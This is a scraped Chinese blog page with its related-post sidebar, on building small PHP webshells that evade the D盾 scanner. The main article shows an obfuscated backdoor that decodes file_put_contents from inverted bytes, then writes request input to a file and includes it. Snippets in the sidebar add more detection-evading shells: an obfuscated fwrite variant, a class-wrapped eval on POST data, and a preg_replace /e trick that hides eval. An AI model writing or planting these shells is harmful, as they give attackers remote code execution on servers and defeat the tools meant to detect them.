PHP小马免杀的浅谈[过最新D盾]

最新推荐文章于 2022-10-23 12:41:52 发布

shadow wolf

最新推荐文章于 2022-10-23 12:41:52 发布

阅读量875

点赞数 2

分类专栏：算法 PHP

本文链接：https://blog.youkuaiyun.com/qq_25017571/article/details/119080343

版权

本文探讨了两种PHP代码免杀的策略，包括利用File_put_contents和fwrite函数写入并执行PHP文件以绕过D盾检测，以及通过使用PHP的类语法包裹可疑的eval函数来防止被识别为可疑行为。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

PHP小马免杀的浅谈[过最新D盾]

绕过

绕过

思路1:使用写文件的函数写出另一个php文件然后include/require 回来执行

方法1:File_put_content

在这里插入图片描述

D盾还是报了，但如果是PHP7.0以上的，还是有绕过方法滴:

<?php
/*
T00ls.net shadowwolf
2021-7-25
*/
( ~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('oagi.php','<?php '.$_GET[a].' ?>');include(

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

shadow wolf

关注关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
2
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

php超小免杀大马_超小PHP小马小结(方便查找后门的朋友)免杀

weixin_39579483的博客

12-30

938

作者: spider我也来个超小PHP小马复制代码代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...

一款过d盾PHP小马

shadowwolf’s blog

12-14

391

<?php $_='%99%88%8D%96%8B%9A'; $pass='a'; $rand_=rand(); $a=$_POST[$pass]; $file=md5('shadowwolf'); $shell='<?php '.$a.' ?>'; $myfile = fopen($file, "w"); (~urldecode($_))($myfile, $shell); include $file; 可以自己测测看啊

2 条评论您还未登录，请先登录后发表或查看评论

PHP过D盾免杀小马.zip

06-14

提供混淆以及未混淆两个文件，可以随意过D盾，可用菜刀直接连接！

小马的免杀

sweetie 的博客

04-12

1005

一般的php一句话后门很容易被网站防火墙waf拦截，而waf通常通过判断关键字来辨别一句话木马，要想绕过waf就需要对木马进行一些变形。(仅供分享经验，不可用作非法用途) 图片来源一.先看一只有趣的小马 <?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?> 沙箱检测它是安全文件用D盾查杀只是发现可以的str_rot1

php免杀,PHP小马免杀

weixin_35991292的博客

03-09

470

PHP小马免杀北极宫爵版php小马aCJdOw0KJGZwPWZvcGVuKCRzeWZkcGF0aCwidyIpOw0KaWYoJGZwKQ0Kew0KZndyaXRlKCRmcCwkX1JFUVVFU1RbImN5ZmRkYXRhIl0uIlxuIik7DQpmY2xvc2UoJGZwKTsNCiRzdGF0aWM9IrGjtOazybmmIjsNCn0NCmVsc2UNCnsNCiRzdGF...

浅谈PHP小马免杀

09-10

1057

在渗透测试过程初期，上传小马，拿到webshell再进行下一步的操作，现如今的网站安全更多是一些云防护、CDN防护、服务器安全软件等等，给渗透测试、提权等带来了一定难度的提升，今天探讨一下如何做PHP小马的免杀。小马：体积、代码量比较小的webshell文件，一般借助“中国菜刀”、蚁剑等shell链接工具，进行进一步的渗透测试小马因为代码小，显得更加灵活。就...

PHP小马免杀的浅谈[过最新D盾]1

08-03

这篇文章主要探讨的是如何在PHP环境中创建“小马”（webshell）并使其免于被安全软件如D盾检测。PHP小马通常是指一种恶意代码，允许攻击者远程控制被入侵的服务器，执行任意PHP命令。文章中提到了两种绕过D盾检测的...

小马考试通ponyexam开源版是基于PHP开发的免费开源在线考试系统.zip

最新发布

01-18

小马考试通ponyexam开源版是基于PHP开发的免费开源在线考试系统，能够快速搭建在线考试平台，系统支持多种题型：单选题、多选题、判断题、填空题、问答题等题型。支持在线考试，支持自动和人工两种方式批阅试卷。...

免杀小马devilsafe 代码

09-20

这类技术主要聚焦于如何让恶意软件（或称\"小马\"）能够绕过主流的安全防御系统，包括杀毒软件、防火墙等，实现所谓的\"免杀\"效果。下面将深入解析\"免杀小马devilsafe代码\"的关键知识点，以及其背后的运作机制。 ...

PHP小马免杀

weixin_34072159的博客

11-12

801

PHP小马免杀 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; c...

木马免杀只需要简单一句话的php

02-12

木马免杀只需要简单的一句话代码php文件就可以轻松过，可以参考

过D盾php webshell免杀马探讨

goddemon

07-19

1794

本文章仅用于渗透交流学习，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......

shell 免杀aspx_Webshell免杀

weixin_39656513的博客

12-31

691

一句话木马在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护，就寻找一个免杀的大马挂马。最常见的php一句话木马这个一句话木马由两部分组成，eval用来执行接收的代码。$_POST['x']来接收数值。本着这个原则，尝试改写一句话木马绕过WAF。搜集了几个常用的php函数执行代码的eval、assert、preg_replace接收数据的$_POST、$_GET、$...

一个过D盾的php小马

https://www.cnblogs.com/zpchcbd/

04-29

1710

这里给大家分享一个自己写的过D盾的马 <?php class ade { static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); } } new ade($_POST[1]); 这里主要注意的一点的是$name...

PHP小马

eT48_Sec

01-04

1949

http://xiaojianke.blog.163.com是我原来的博客，工作后换成了C博客，这里吐槽一下网易博客太差了。看到网上那么多PHP小马，我也来自己写一个，练习PHP编程。 <?php error_reporting(E_ERROR); header('Content-Type:text/html; charset=utf-8'); $path=getcwd(); $pe

超小的PHP小马587字节【php网站的最好后门】绝对免杀！因为本来就是正常代码嘛！...

weixin_34138377的博客

06-07

440

<?php if(@$_GET["act"]=="save"){if(isset($_POST["content"])&&isset($_POST["name"])){if($_POST["content"]!=""&&$_POST["name"]!=""){if(fwrite(fopen(stripslashes($_POST["nam...

免杀学习——PHP免杀

ZxC789456302的博客

10-23

1899

php上马免杀，理论上是只要绕过waf就可以，但特殊情况下存在驻场人员手动监控，看到一些奇怪的参就直接给你ban了，所以各位师傅尽量不要在一些敏感时期进行渗透测试，仅用于技术学习推荐大家去看一下这位师傅的文章php免杀合集 - 跳跳糖 (tttang.com)，里面还有一些扩展，十分详细。

2017php免杀小马,PHP7.1后webshell免杀

weixin_42177768的博客

03-11

318

严格的D盾D盾说，我是个严格的人，看到eval我就报木马，“看着像“=”就是“木马，宁可错杀一千，绝不放过一个。好了，多说无益，一起看看严格的D盾是如何错杀的。我随手写一个php文件：代码如下：function encode($para0){return$para0;}$b= encode("aaaa");$a= "ccc";eval($a);?>很明显没有传参呀，GET和POST都没有，压...

PHP小马免杀技巧：绕过D盾解析